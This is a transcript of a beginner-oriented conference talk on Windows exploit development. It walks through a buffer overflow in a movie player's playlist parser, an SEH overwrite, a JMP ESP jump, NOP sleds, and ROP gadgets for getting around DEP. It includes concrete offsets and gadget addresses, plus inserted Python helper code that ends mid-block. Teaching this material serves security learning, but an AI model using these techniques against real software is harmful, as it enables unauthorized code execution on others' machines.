
Hey everyone, how are you? You guys still awake? Yeah, okay, well, I'm gonna put you to sleep. How many people like looking at hex? Yeah, that's right, that was more hands than I was expecting, that's good. Okay, so my talk is really long and I can't say it all because I'd buffer overflow or something, I don't know. I don't know what I was thinking when I submitted this talk, because I thought I could go from beginning to end, you know, in 60 minutes, and we'll see what happens. I'm paying two tracks, let's see, there we go. Who am I? I'm paying tracks. I'm a lead security engineer at a big company somewhere around here, and I like trying to figure out how things work and I like breaking things. You know, I didn't put that in the slide, but I do like breaking things, and we're gonna learn how to break some stuff today. I mean, this is not my profession at all; I do this for fun, even though people have told me that I probably should look for work in this field. What I actually do is malware reversing for a career; this is kind of similar. So I wanted to talk about how to get started in this field. I think that a lot of people don't get started because they think, man, there's hex involved, it's hard, or there's assembly language, right, it's really hard. It's not really that hard. I think it's kind of like, you know, you just have to get your feet wet, and then you realize, you know what, the water is actually pretty warm. I'll get into it a little bit more. There's a lot of literature out there, and I think that one of the problems that I've seen with the literature is it dives in real deep, right, really fast, and then it just scares you off. Like, my brain would hurt after reading a couple of pages and I'd have to walk away, and then like a year later I'd be like, wait, I remember I wanted to learn about that. So today I hope that I can give you that push into the water, and hopefully it's not too deep, and you guys can start breaking some stuff too. And if you guys have questions afterwards and you're interested, reach out to me with questions and stuff; I'm always open to sharing what I know. And hey, if you know something more than me, please let me know, because I am all about learning; I would love to share information. So when you get started, what you need: it really makes it a lot easier if you have some type of virtualization software. VMware is great. You really probably want to have something that can take snapshots, because it's a real bummer when you have to go and start everything over again, over and over and over again; if you can take a snapshot and go back to the snapshot quick, it makes life a lot easier. You need a victim, right. Today a Microsoft app is gonna be the victim, because it's just so easy right now, because on Microsoft, right... Microsoft is great, but it's because this particular piece of software is just like, I think it was written just to be, you know, pwned, I don't know. And you need a debugger, right, and some other tools. I'm going to show you some of the tools that we're gonna use, some really, really cool tools. So I am NOT very good with slides, and we're not gonna be doing a slideshow here. I did pray to the demo gods this morning and I'm hoping that they heard my calls, because this is an entire demo for 60 minutes with some slides thrown in. So what do we have here? We have a Python script. I hope everybody can see it, wait, in the back; if not, please move forward, there's lots of space down here. I'm using Python. If you're a Ruby person, use Ruby, you know; if you are a C# person, more power to you, man.
I use Python just because, I don't know, I used to be a Perl guy, and then one day I woke up and realized that everybody was saying that Python was easier; it was really, right, and I decided to change my ways. So I have a script. This is how you want to start out with a buffer overflow. What do we have? We're gonna create a hundred... eight thousand A's, sorry, I was missing a zero, just a thousand A's, right. Why is it capitalized? Why? I have no idea; that seems to be the convention, right. Like I was telling the class I was teaching yesterday, I would have chosen capital B's. For those that were not in my class, why would I choose capital B's for the thing I want to put in there? Anyone? Capital B's, okay, capital B in hex is 42; it's the answer to life, the universe and everything, right. But I know, right, yeah, yeah, that's true. So I'm using A; it's just because it's convention, you can use whatever you want. If capital B is 42, what's capital A? Anybody? 41, right, exactly. So we're going to just create a file. This particular piece of software is a movie player, right, and the movie player needs a playlist, so we're creating a playlist, obviously with a bunch of A's in it, right. And that's right, okay, so I'm gonna just go and run that script. I called it exploit_eip, and it created a file; it's my playlist. Let's check it out. Look at that, all those movies, or those songs, in that playlist, right; looks good to me. Or movies, I'm sorry, it's a movie player. And I'm gonna go over... so I have two boxes, right. You need two boxes, or, if you can run Python or whatever scripting language you use on a Windows box, you can probably get away with just using one box, if your victim is the same platform as what you're developing your code on, right. But I'm using Kali as one box, and I'm using my Windows box, obviously, as our victim. I'm using a shared folder between the two so that I can just create the file on one side and then execute the exploit on the other. So this is my exploit. This is very complicated, right? This is what I'm talking about: let's get our feet wet, let's dip our toe in, right; it's just a bunch of A's. Well, come to find out with this piece of software... let's fire this piece of software up. I'll pay later. Okay, I'm gonna open it up. Okay, here's the file, okay, and I'm gonna open it up in a debugger, Immunity Debugger. Okay, Immunity Debugger is a debugger based on
OllyDbg. Lots of people know about OllyDbg, right, because we use it for malware reversing. Immunity Debugger is an awesome debugger as well; it's based a lot, like I said, on OllyDbg. The nice thing, the reason why I'm using it, is because it supports Python, right, and there is this great gentleman whose name is Peter, and I cannot say his last name, but he goes by the name corelan, and he wrote Mona, and Mona is a great tool to help you figure out how to write these exploits. So I'm going to go and attach my debugger to the application and see what happens, right. So I'm gonna start it up, go, and the application crashed. First, what I need to do is I need to go and accept some exceptions that have nothing to do with the overflow that I just did to this, but you will see right now that there's a couple things that have happened, right. Do we see something that might be noticeable on the screen at the moment? Yes, we see some 41s. There's lots of 41s; there's about a thousand of them actually, there's probably multiple thousands of them in memory right now. The other thing that I've done is I've overwritten EIP. EIP is the instruction pointer that tells the application what it's supposed to do next. Guess what, there is no instruction at memory address 41414141, yeah. So what just happened? I just crashed the app, just by sending it A's. All right, that's it, I'm done, hey, how'd you guys like my talk? Okay, okay, thanks, thanks. Okay, let's develop this into something more meaningful, right. Okay, so we're gonna go and... you know what, I'm just gonna fix my screen here. Yeah, I made it smaller; yeah, for some reason it's not really doing what I wanted. Okay, so what I need to do now is I need to figure out how far into my payload I have to go before I overwrite EIP, right,
because I really want to control EIP, because if I can control EIP, I can tell the application what to do, right; it becomes mine. So what I'm gonna do is I'm gonna use a tool that lots of you know. How many red teamers are in here? Raise your hand high, be proud, that's right, okay. I'm not a red teamer, but I aspire to be one. Metasploit is a great tool, and what we're going to do is we're going to utilize a function of Metasploit called pattern_create. Man, sorry about this, having it plugged into this projector is messing with my... okay, here we go. And if you go and use it, what it does is it creates a cyclical pattern. Actually, you know what, before I do that, let's say how big I want it, because that's going to be really bad. Okay, yeah, sorry guys.
There, so you can see it. Oh, you gotta be kidding me. Oh, can you? Oh good, okay, I'm glad you can see it; I can't see anything. Okay, there we go, I can see it now. Okay, I'm gonna do this again with 1,000 characters. There we go. Okay, so what it's done is it's created a cyclical pattern, right; there's no repeating pattern in this, right. I think there is probably a limit as to how big of a pattern you can create, but for our purposes here we only need a pattern that's a thousand bytes long. So what I'm gonna do is I'm gonna throw that into my script real quick, okay, and I'm going to replace my thousand A's with my pattern.
So, okay, so here we are, we've got our pattern. I'm gonna run it again. This went better in my head, okay. Okay, so now if you look at the file, right, we've just got this pattern. Okay, so I'm gonna go back over to my Windows machine, and now I'm gonna try to figure out how far off, or how big the offset is, before I'm hitting EIP.
Opening it up, okay, I've attached, I'm gonna crash it again, and crashed it again, right. This has caused the crash. Now look at it and see what's in EIP. We have a different... we don't have 41s anymore, right, because I didn't send all capital A's to it, but I do want to know what this represents, how big of an offset it is. I can go back and take this hex that is in EIP right now and ask Metasploit what the offset is by using pattern_offset; so pattern_offset is the partner to pattern_create. But I'm going to save some time, and I'm going to use Mona to figure it out. So within Immunity Debugger I can just go down to the bottom and say, hey Mona, I want the pattern offset of 37694136. Okay, an offset of 260 bytes, that's all, and then I have control of EIP. So I'm gonna go back, I'm gonna change my script again, I'm gonna get rid of this pattern, and what did I say, two hundred sixty bytes. All right, so pre_eip equals 260 bytes, so this time I'm going to change this to pre_eip, right. But hey, you know what, I also want to make sure that I am overwriting EIP, so I'm gonna put B's, four B's, in, because that will fill out EIP, right, because I need four bytes for this register. And then I'm going to fill the rest of it with, what, C's? Yeah, C sounds good. So I'm gonna say tail size equals total minus the payload size, right, let's see, the length of the payload, and then I'm gonna say pretty much just this up here, same thing, and I'm gonna put C's in here and change this to tail size. So what we're gonna have in this file... oh yeah, what did I do? Yep, that's right, thank you. Did I miss another one? Oh yeah, nice, thanks guys. Okay, this is the reason why you always have to pray to the demo gods. Okay, perfect, right, so hopefully the B's will show up in EIP. Okay, go back over and start it up again. So there's a lot of repetition to this, right; you're going to be going back and forth, back and forth, until you get what you want.
Oh yeah, they're happy about that. Yeah, there you go, awesome. It's very hard with this screen the way it is. Okay, okay, so now what have we done? We verified that indeed we have 42s in EIP, okay. The other thing to know is I want to look at the stack down here; where this blue line is, is the stack, right, and you can see how I have A's above the B's. The B's at memory address 0018F204 is apparently where EIP is being pulled off the stack, right; more than likely there's a ret that occurred that caused this to happen, right. There's a saved EIP that's supposed to be at that particular memory address; the function is finishing, going back to the calling function, and instead of going back to where it's supposed to, I told it to go to BBBB, right, hex address 42, answer to life, the universe and everything, right. But then also on the stack you also see C's going down further, right; I have control of a lot of the stack right now, right, so I can do a lot of stuff here. So the next thing I want to do is I want to do something with this. Man, what can I do, what can I do from here? If that was a ret that told the application to go someplace else, well, don't I go and try to figure out where I want it to go? Hey, let's see where we can tell it to go, right. Okay, so Mona has this great tool called jmp, and you can say, Mona, I want to know all the addresses in this memory space that include a jump. I'm very interested in a JMP ESP. Why a JMP ESP? Because ESP is highlighted in blue right now, right; I have control of that memory address, right. I can tell it to go someplace as long as I put that memory address in that spot where that blue line is, because that's where ESP is pointing. So I'm gonna go and ask Mona for that. I'd
say !mona jmp -r esp, because it's register ESP, right. Well, I've done this; by the miracle of television, I've gone and done that already. Sometimes whenever you run commands in Mona they come back really quick, sometimes they come back really slow, so if you're doing a presentation like this and you say mona jmp, it'll come back pretty quick, and people won't be staring at you for a long time. If you go and say mona rop, right, and that's where we're trying to get to, you might as well tell everybody to go get some coffee and come back in an hour, you know. So yeah, you definitely want to think about that whenever you're doing this type of work. So I did some of this beforehand, and what I want is I want to know about the jumps. So in my files I have a jmp text file that Mona created, and if you go down you'll find that there's all of these jumps here, right, all of these jumps. Now, the interesting thing about the way Mona goes and looks for things is it goes and says, hey, if this library, or this DLL, has any type of exploit mitigation properties, I don't really want to look in them, right. If a DLL has ASLR turned on and the memory addresses are always changing, that's no good to me; I need to have addresses that are reliable, right. Now all the OS DLLs in Windows 7 are all ASLR; they're changing all the time, so I can't use those. Very interesting, this application has multiple libraries that got shipped with the application, and they are, for the most part, all safe for me to use, because there's no memory or exploit mitigation properties compiled into them. It makes it very easy to do this type of work with this application. So there's actually this one file, this library you see come up over and over and over again, its configuration DLL; there is no mitigation on it at all, no rebase, no SafeSEH, and if you keep looking across the screen, no ASLR. So we're gonna just take this JMP ESP, this memory address, and we're gonna throw it into our script right here. Now what I need to do is I need to pack it, because the x86 architecture is little-endian, which means it flips all the bits backwards, so I can either go through the painstaking task of flipping my bits and making a mistake while you guys are watching, or I can just use pack and have it do the work for me, right. Okay, so now I should get my application to go and execute that jump. Now, did I put the jump in there? I didn't inject any type of code so far. All right, this is
really important as far as ROP is concerned. What ROP is, is the art of not injecting code into the application but still having control of the application itself. So what I've done is I've found an instruction that already exists, something I can use all the time, and I'm going to tell it to go and execute this code. What I'm also going to do, let's just go back and look at the application again. We have a series of C's, right, and I need to... oh yeah, I have a series of C's, and I need to figure out how much of a distance there is between where that command is, where the memory address is where I'm controlling EIP, and where ESP is pointing at the moment, right, because what I'm gonna do is I'm gonna want to put some code in there to execute. Now I'm kind of stepping away from ROP for a minute with this extra demonstration, just so that you can see how this one ROP instruction, in a way this one gadget, is going to help me out. Okay, so what do I have? I have one, two, three, four... I have sixteen C's in between, so I'm gonna put that in my script, so that we know we can also put some instructions in there. So I just say D for the sake of argument, because I'm on a roll now, and I'm gonna also throw into the payload, I'm gonna throw in hex CC. Anybody know what hex CC does to a debugger? It pauses it, right, yep, okay. And I'm gonna just throw four of those in, right; one is good enough, but I'm gonna throw four in because it will look pretty. Okay, oh yeah, thank you, good job, okay. Okay, let's check it out and see what happens.
Start it up, attach the debugger again, right, and now we're gonna actually... you know what, before I load it, what I'm gonna do is I'm going to halt the ex... actually, you know, I would hit the CCs; I was thinking ahead and didn't even think about it. Okay, so I'm gonna accept these exceptions that have nothing to do with my... okay. So what just happened? Do you guys see what is in the instruction panel? We have CCs. How did that happen? I told it to go there, right. What happened is something that should never really happen in an application: I just told the application to jump and execute code on my stack, right. What you're seeing up here, there were those CCs, and then the 43s, the inc ebx; that's the stuff I put on the stack, right; those aren't instructions, that's my playlist, right. So now I have control; I can do whatever I want, I can execute, because I got that int 3, the interrupt 3, to execute. So what am I gonna do? I'm gonna go back and I'm gonna add shellcode to this particular exploit, because it's pretty easy, right. Where did I get this shellcode? Anybody? Now, yeah, I have no idea where I got it, yeah, I have no idea, so I don't know what it's gonna do, right. Okay,
so I need to get rid of these C's first, right, yeah.
The reason is because I am trying to see what is happening in the memory space while I'm doing this research, right, because whenever you are affecting things in the application you need to know how you're affecting it, and you don't know before it happens how the memory is set up. When you start out, you just know there's a vulnerability; you know, you see it on Exploit-DB, you see a CVE, right; it says there's a vulnerability, and then you do some more research and it says, oh yeah, if you throw so-and-so into this, it's gonna crash it, and then you're like, oh, it crashes it, yeah, you know, how can I take control of it, right? I'm about to take control of it, right, really, really well. Okay, oh, I'll get to that, yeah, yeah, yep, yep, yep. Yeah, the interrupt 3 is telling the debugger... that is, is this a way of... yeah, that is a breakpoint, but I think it's not the breakpoint that you were thinking of, but I will show you that in a minute. So a minute ago, when I hesitated and I said, oh, you know what, I don't even need this... when I hesitated, I said, oh wait, I need to do something else; I was thinking, oh, I need to go and set my breakpoint. All right, did anybody just see what happened? I popped my shell, right. That's easy, that's it. All right, did I use ROP? So, okay, yeah, you guys are kind, okay. So I popped it, right, that was easy. Now my foot's wet, right. You guys can do that, anybody can do it if you've got the right application. Do it five times, make sure that you can get comfortable doing it, right; it's really easy. Okay, so now let's dive in a little bit deeper, right. So if I go back to my slides real quick: so we found EIP, right, I talked about pattern_create, so there's this interesting thing
called structured exception handling, and what it is, is whenever a good developer writes code, they will write it so that they know that there's going to be this particular thing that happens, right, in the code, and they know that sometimes it might not successfully do whatever it's supposed to do, right, so they create an exception for it. Cool, right. So I'm gonna try something, and if that do-something doesn't work out, we're gonna try to catch that exception and then we're gonna do something else. If everything's fine with the first do-something, then it just keeps on going; it totally ignores the catch. But if something bad happens, like, you know, EIP gets shoved with 41414141, then we probably should do something about that, right. Well, interestingly enough, with this particular application, when I did that, when I threw the 41s into EIP, an exception occurred. Let's check it out. So I'm gonna go back, and, you know, I love the color of the command shell, I just have to say that's a beautiful thing. All right, that's not supposed to happen, but hey, whatever, that's cool. Okay, so I'm gonna start it up again, and I'll pay later, and I really have to try to figure out how to get rid of that. So I'm gonna attach to it, and I'm just gonna go through this again, right. And actually, you know what, let's create a totally different file. Pop back over, and this time I'm going to have a different script, and it's called exploit_seh, right. Yeah, does it look familiar? Yeah, it looks a lot familiar, right; it's the same script that we started out with. This time the difference is there's 700 bytes instead of a thousand bytes. Why? Well, in this case it really doesn't matter, right. In some cases it might really matter, because what will happen is sometimes you can do certain things with a certain size payload, but let's say you want to throw an exception, right, and take over the exception handler, and for some reason, if the payload is too big, the exception never occurs, because maybe something else handled the fact that your payload is too big. So I'm just going to pretend, you know, that I have to have a payload of 700 instead of a thousand to initiate the vulnerability in this application. And what I'm gonna do is I'm going to create this file, right. So we've got a file of A's, 700 of them. Go back; this time what we're gonna do is we're gonna pass the exception, pass the point of the E... open it up, we crashed, okay. We're gonna get to the point where EIP is overwritten with 41s again, right; we just saw this, this has just happened. But the thing I didn't do before is I didn't look at the exception handlers, right. I overwrote the exception handlers for this. So this application is good, right, in a way, kind of; it knows something bad happened, right. So in this case something bad happens, so the exception should go do something to fix it, right. But here's the bad thing: I overwrote that too, with letters, like, really, come on. So now what do we do? We're gonna do this exact same thing as
we did before; we're gonna do the pattern_create. Everybody keeping up with me? That's excellent, awesome, I love it. So this time I'm just gonna say usr, share, metasploit, tools, exploit, pattern_create, right, our friend pattern_create from Metasploit, I want 700, and we're gonna throw it into the script. Wow, that's pretty trippy. Here, let's just do that again, because I have no idea what just happened.
Okay, so now my file should have... oh, this just isn't going along. I apologize, guys; this is the reason why you don't do live demos. Okay, apparently, okay, and that is okay; I did prepare for this, I had an original, yeah, right, okay. So this is the other thing that's bad about this, the fact that you try to do something cool like this in under an hour, and that never does... there we go. Okay, so now we should have our pattern; I'm going to throw that in my payload. While I'm doing this, do you guys have any questions while I'm trying to recover? Okay.
Okay, here we go, so here we have a new file, right, and it should have our pattern in it. Now we can go and open this up again, and we're going to find out what the offset is for this exception handler. Okay, okay, so here's the point where we were at before; we overwrote EIP with that, a memory address should be the same, right, because it's the same point, 260 characters into the payload, as we had before, right. Now we're gonna actually look at the exception handlers, and now the 41s are different, right; we've changed what's in the exception handlers. The nice thing about the way the exception handler works on
Windows is that you can use a gadget called pop pop ret to be able to take control of that particular data structure, which is the exception handler. So what we're gonna do is we're gonna go back to Mona and we're gonna say, Mona, I want to know what the offset is of this lower address. So the way that the exception handlers actually work is there's two parts of each record. The first part is a pointer to the next record. So if you think about it, think about this: whenever you have an exception, there's the part where, if the exception occurs, there's the catch part, and it goes off and, you know, it's supposed to go do something; that is the exception handler itself, and there's a pointer on the stack that points to that code to go and do that, right. And then below that, or right above that, there's a pointer to the next exception handler. So the way it should work is, if for some reason that handler fails, what do we want to do? We want to go to the next handler, jeez, maybe the next handler, and have that take care of what's going on, and if that fails, let's go to the next thing. And the nice thing about Windows is the fact that there's an exception handler for the OS, right, and if you hit that, your application just crashes; it just disappears, right. So that is the reason why applications crash a lot of the time: because the exception handler process tried to deal with whatever's going on, and then it got down to the bottom, naturally occurring, not what we're doing here of course, and the operating system says, oh, you just hit my exception handler, I'm shutting you down, right, you're going down now. So we are going to take advantage of this functionality and redirect execution flow because of it. So I'm gonna go and take the offset of this lower address, which is actually the pointer to the next record in the chain.
This one up here, the 41347541, that is actually the pointer to the exception handler itself. So what I need to do is I need to remember the pointer to the next record, which is the lower one, right, for something I'm going to do in a minute, but also this upper one is interesting to me, because I can use that to do kind of what I did before: I can go find a memory address that has a pop pop ret in it and redirect the flow of execution of this application. So I'm gonna go and ask Mona for the pattern offset, and I'm going to say 33754132, and the offset is 608 bytes. So I'm gonna go back, and this time I'm gonna say 608 bytes into it, right; pre_seh equals 608 bytes, right, and what I want is this to be pre_seh, and then I'm going to write my A's, or my B's, to overwrite the pointer to the next record, right, and then I'm going to put C's in to overwrite the pointer to the exception handler itself, and then I'm gonna just finish it out: tail size equals total minus the length of the payload. Yes, thank you. So do you guys understand why I'm doing this last bit, why I keep doing this here,
the tail size? That's right, yes. I want to make sure that my payload stays the same size, exactly, because if I make the payload too small, I might not overwrite something that should trigger the vulnerability. Yeah, sometimes you can't, yep; it depends on the application. This is all dependent on applications, right; every application that you look at is going to be completely different. This one, you know, I think that you could probably write a couple thousand, thousands of bytes into it and it doesn't care. Okay.
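To check the two offsets the speaker reads out of the debugger (37694136 at 260 bytes for EIP, 33754132 at 608 bytes for the next-record pointer), here is an added Python reimplementation of the pattern_create/pattern_offset logic, plus a builder for the A/B/C test file whose tail is padded to a fixed total. This is example code written for this transcript, not the speaker's script and not Metasploit's or Mona's own source; it assumes Metasploit's default character sets (upper, lower, digit) and a 4-byte little-endian EIP.

```python
import struct

# Character sets used by Metasploit's pattern_create: the digit changes fastest,
# then the lowercase letter, then the uppercase letter ("Aa0Aa1...Aa9Ab0...").
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
CYCLE = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGIT)  # 20280 bytes


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the cyclic pattern (it only repeats after 20280 bytes)."""
    reps = length // len(CYCLE) + 1
    return (CYCLE * reps)[:length].encode("ascii")


def pattern_offset(value, length: int = len(CYCLE)) -> int:
    """Map the value seen in EIP (or in an SEH record) back to its offset in the pattern.

    `value` may be the integer the debugger displays (e.g. 0x37694136) or the raw
    4 bytes. The integer is packed little-endian first: the debugger shows
    0x37694136, but the bytes that landed in memory were b"6Ai7".
    Returns -1 if the value is not part of the pattern (e.g. 0x41414141).
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    return pattern_create(length).find(needle)


def build_layout(offset: int, total: int,
                 filler_before: bytes = b"A", marker: bytes = b"B",
                 filler_after: bytes = b"C") -> bytes:
    """Rebuild the talk's second test file: filler up to `offset`, a 4-byte marker
    where the overwritten pointer sits, then filler so the total size stays fixed
    (the "tail size" the talk keeps recomputing so the file never shrinks)."""
    if offset + 4 > total:
        raise ValueError("offset leaves no room for a 4-byte marker within total")
    tail = total - offset - 4
    return filler_before * offset + marker * 4 + filler_after * tail


if __name__ == "__main__":
    # The values read out of the debugger in the talk (constructed check, not captured output).
    print(pattern_offset(0x37694136))  # 260: EIP offset in the 1000-byte file
    print(pattern_offset(0x33754132))  # 608: next-record pointer in the 700-byte file
    print(pattern_offset(0x41347541))  # 612: handler pointer, four bytes later
    print(build_layout(260, 1000)[256:268])  # b'AAAABBBBCCCC'
```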
Yeah, it's called fuzzing, trial and error, yeah, good question. You know, there's another application that I gave to the class for an exercise yesterday, and I didn't tell them how big of a buffer they needed, right, how big of a payload they needed, and I said, hey, start with ten thousand bytes and just keep on going until you crash it, right, because the application is just gonna say, oh yeah, that's cool, I'm gonna ignore you, and then you're gonna send it more bytes and it's gonna say, yeah, yeah, I ignore you, I'm ignoring you again, right, and then you're gonna get to this one point and it's going to just crash out all over the place. Okay, so now let's see if we overwrote the exception handler here.
Okay, here we are; we overwrote EIP with 41s, and here we see that we indeed have 42s in the pointer to the next record and 43s in the pointer to the exception handler. So now we've won control again, right; we're back in the same situation. What can I do here? Well, the thing with the exception handler on Windows is, to take advantage of this, we want to be able to sort of pivot like we did before; before, we kind of pivoted from running instructions normally to running instructions off the stack. So what I'm gonna do now is I'm gonna use a pop pop ret, and that's going to allow me to kind of pivot execution back to the stack, right. And a gadget, when you're dealing with ROP, is normally some type of series of instructions followed by a ret, so a pop pop ret is a gadget as far as ROP is concerned. So with this we're definitely getting into ROP territory, and it's a simple one, but we're still doing it. So let me just go back and look for a ROP, all right, pop pop ret. So in Mona, I mean in Immunity Debugger, I could go in and ask Mona: Mona, I want to know where pop pop rets are, and there is a command called seh, right, because we're dealing with SEH at the moment; makes it pretty easy. When you run it, you will get a file called seh.txt, and in there, if we go down, we will find all of these pop pop rets. Look at them all, I mean, there's tons of them. Let's see how long this thing is, right; seh, you know, thousands of pop pop rets that we can use, so we can pretty much grab any one of them that we want. Oh man, I am way out of time; Jared, sorry, man. Okay, so this first one, should I use it? No, I can't use this first one. Why? Because this application doesn't allow me to use hex 00 in my
payload; if I try to use it, it would just mess me up. So I'm gonna use the next one, I'm gonna use this one. Go back... was that somebody asked why? Yeah, okay, why, okay, that's a great question. There are bad characters for some applications; some applications don't like hex 00. Does anybody know why an application wouldn't like hex 00? It's a null byte; it's a string terminator, right, right. So with this application, guess what it does: it reads in the playlist as a string, right, and it terminates. So if my payload has a null byte in it, then it stops reading at that point, and my playlist is that much shorter, right. So I have to pick this next instruction because there's no null bytes in it. Okay, so what I'm gonna do is I'm just gonna go in and do the same thing as I did before. And why am I using struct.pack? Does anybody remember? That's right, this is little-endian, so we need to deal with it accordingly. Okay, so the other thing I'm going to do, for time's sake... so I overwrote that; I put the pack in the spot where the pointer to the exception handler is, so that I can execute my pop pop ret. The other thing that I'm going to do... that causes the behavior of SEH to actually... allow me to jump to the point where the pointer to the next record is, which is the four bytes before that, where my B's were. And what I'm gonna put in here is I'm gonna put a jmp 6 bytes, because what I'm gonna do is I'm going to pop pop ret, kind of pivot execution onto the stack, execute my jmp 6, which will allow me to jump over the gadget that I have here, my pop pop ret, and then I'll execute my shellcode. So what I'm going to do here is I'm going to put EB 06, which is, in hex machine code, a jmp 6; so remember that, there's going to be a test later. And then I'm going to also put two NOPs, and the reason why I'm just going to put two NOPs in there, I'm putting those NOPs in there because I just need to fill some space, right, because there's 4 bytes that I have to fill for that particular record. And then what I'm also going to do is, since I know this is going to work, I'm just gonna go and grab my shellcode again, all right, and I'm going to put it into my script.
okay and if I put it right here I'm actually going to put some knots in here as well just so it gives it a little bit of nice landing not the reason you put knops in is to make it so that you can allow the cpu to kind of slide down the stack right sometimes you don't know exactly where the CPU is going to land right now we know because I'm jumping six bytes but if we don't know exactly where we're in the land putting an OP slide in there actually gives us a bigger land landing to to land in so I'm gonna put that in there and then after that I'm just gonna put a
payload plus equals my shellcode right
okay and I'm gonna execute that and if oh I must have done something wrong um oh yeah yeah no maybe my shell code is longer than let's say hex it looks fine let's see what just happens and go from there okay so we're gonna go back and start it up again and see if it crashes yep okay so do what just happened is we got two shows for the price of one right very cool and what's really nice about this particular exploit is it cleans up the application right I don't even have to close it out I mean that's really nice okay and I got to yeah and they're persistent too this is actually something that's particular to this one
application. So what is ROP? ROP is where you go and find a series of instructions that have a return at the end, and the reason for doing that is so that you can, like I did with the pop pop ret, go find the pop pop ret, get that memory address and put it onto the stack, right, and then what I do from there is I continually add, you know, different gadgets to create a program that does what I want, right. The interesting thing about ROP is it has been proven that it is nearly Turing complete, meaning that you can pretty much do anything that you want as long as your gadgets, you know, are plentiful enough to do it.
Now the interesting thing about this application is, when you ask Mona to ROP, it goes and finds all the ROPs in the space, I mean gadgets in the memory space of the application. And when you are looking for gadgets, you're not looking for gadgets in the normal way that you think about it. What it does is it goes and looks for the machine code for ret and then works backwards to see if there's the possibility of creating a series of instructions that would help out in ROPing. The reason for doing that is because the x86 architecture has variable length instructions, right. It's kind of like taking a long
paragraph, right, and taking out all the whitespace, mashing those words together, right. You can still tell kind of what the paragraph said, or the sentence said originally, right, but if you go and look at specific spots of the paragraph without reading through it, you'll find other words in there, right, in between the real words that were there before. Can you visualize that? Right, with ROP, when you look for a gadget, you're doing the exact same thing. So sometimes it's funny when you're in the debugger, you know, you're picking a memory address that's not really, you know, the right memory address for the application code, but it starts a gadget with a return at the end, right, and the
debugger goes crazy, because then you see a bunch of other, like, instructions past that gadget that make no sense, like there would be no way there'd be instructions like that, but it's just because that gadget actually falls in between the real instructions, right. So that's what ROPing is. Like I said, with ROPing the gadgets normally end in returns, but that's not always true. You can have gadgets that have any instruction at the end that will get you back to, you know, executing the next address, just like a ret. So if you had a jump ESP, that would work as well. Yes sir. When you're ROPing, you're going to find a bunch of memory
addresses that do different things, and those memory addresses are in, you know, DLLs more than likely, right, like configuration.dll, right, that's a goldmine for this application. And what you do is you say, you know what, I need to do a certain thing, I'm gonna find the memory address for a series of instructions that do that for me, and I'll have an example in a minute, and then you just put those on the stack. So you're not putting instructions on the stack. It's like the difference between the pop pop ret and the jump 6: the first one is a gadget, that would be a ROP, all right, part of a ROP; the jump
6, that was an instruction I put in my payload. When I ROP, I want to not put any instructions in, and I only put memory addresses on there. Okay, so here's my first example, or my only example, I took my other example out actually. So what did we say? We said that null bytes break this application, right, so I can't use a null byte. What if I have to push something that has a null byte onto the stack, for instance this 201, and I need to move it into EBX? What do I do? All right, that's ROP, right. So I found a memory address,
6404C268, more than likely being in configuration.dll: a pop EAX and a return. Is that a gadget? Yeah it is, because it's an instruction with a return at the end, right. So what should I do with that? I'm going to take FFFFFDFF and put it right under it, so right in my payload, right, I have my A's, my A's, my A's, my A's, and then I have this first value, 6404C268, and then after that I have FFFFFDFF, right. And then I need to negate it. Why? Because if I negate that value it becomes my 201. Did I have to put any
null bytes into my payload? No, I didn't. Did I put any instructions in my payload yet? No, I didn't, right. Yeah, as long as... if you find a gadget that's an add, then you can use it, definitely, yeah man, definitely. Go ahead. Oh,
actually, whenever you ask Mona to ROP, you can say Mona rop and I want to only use characters that are good for me, so I can tell it what the bad characters are, and then it will only find gadgets, or make suggestions of gadgets, that do not have those characters. Great question, thank you, I appreciate that. And then the last instruction, right, yeah, memory address 61641C70, there's an exchange EAX, EBX. What does that do for me? That puts my 201 into the EBX register, right. I've accomplished my goal: I have not put any code into my payload, I've only put memory addresses in there, right. The neat thing about this is, if I
know that there's multiple memory addresses with each of these types of instructions, right, I could make it so that it changes my payload every single time. So why would I want to do something like this? Well, there's something called DEP, right. DEP is kind of a pain, right, because what does that do? That makes it so that you can't execute code off the stack. Yeah, that sucks. All right, well, Microsoft gave you a solution for that, it's called VirtualProtect, and a bunch of other OS functions. VirtualProtect allows you to turn no-execute off on certain pages of memory. Well, what do we want to do with that? I don't know, maybe turn off the, you know,
make the stack no-execute, I mean make it execute, right, executable. We can use VirtualProtect to do that. Why did I have this example here, that 201? Well, for VirtualProtect, maybe my shellcode is 201 bytes long. So what I do is, with VirtualProtect you need a couple of things whenever you call it. You have the return address, that is the location as to where VirtualProtect is going to return to; that's going to be where my shellcode lives, right. And then there's the lpAddress, that is where I want to change my permissions to execute, right; that's gonna be the same spot as the shellcode. And then there's a
couple other things that we need to do, right. We need to define execute read write, which is the 40, it's the same thing as before, and then there's this weird thing at the end, I don't really know why that function needs it. And then to do it, originally, if I had had time, I was going to show you how to use PUSHAD to put all of the information to execute VirtualProtect onto the stack. By using PUSHAD, that would be an exercise for you guys at home. Are there any questions as far as ROP is concerned and getting your feet wet? And hopefully a little bit of what I've shown you gets you to want to, you know,
try this out. For the pop pop ret: it allows you to pivot the execution from the normal area of memory to the area on the stack, only when you were trying to exploit SEH, because what it does is it moves execution, points execution, to that pointer to the next SEH record, which you have control over. Yep. Yeah, no, that's cool. Yeah, if you have questions please come and ask me. Yep, yep, thank you very much. Yes, thanks a lot.
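As an added example (my own code, not from the talk, Mona or Immunity Debugger): a small Python script that packs values little-endian with struct.pack, checks a fragment for the null byte that truncates the playlist, and walks the 201 trick through a toy simulator of the three gadgets the talk chains (pop eax; neg eax; xchg eax, ebx). The gadget addresses are constructed placeholders, not the ones quoted in the talk, and the builder also flags the case where negation still leaves a null byte behind, which the trick alone cannot fix.

```python
import struct

BAD_CHARS = {0x00}  # the null byte this playlist parser stops reading at

def p32(value):
    """Pack a 32-bit value little-endian, as struct.pack('<I') does."""
    return struct.pack("<I", value & 0xFFFFFFFF)

def bad_chars_in(data, bad=BAD_CHARS):
    """Return the offsets of every bad character in a payload fragment."""
    return [i for i, b in enumerate(data) if b in bad]

def negate32(value):
    """Two's-complement negation, i.e. what 'neg eax' does to the register."""
    return (-value) & 0xFFFFFFFF

# Constructed placeholder gadget addresses for the simulator (not real ones).
# Each packs little-endian without a null byte, so it is usable in this payload.
GADGETS = {
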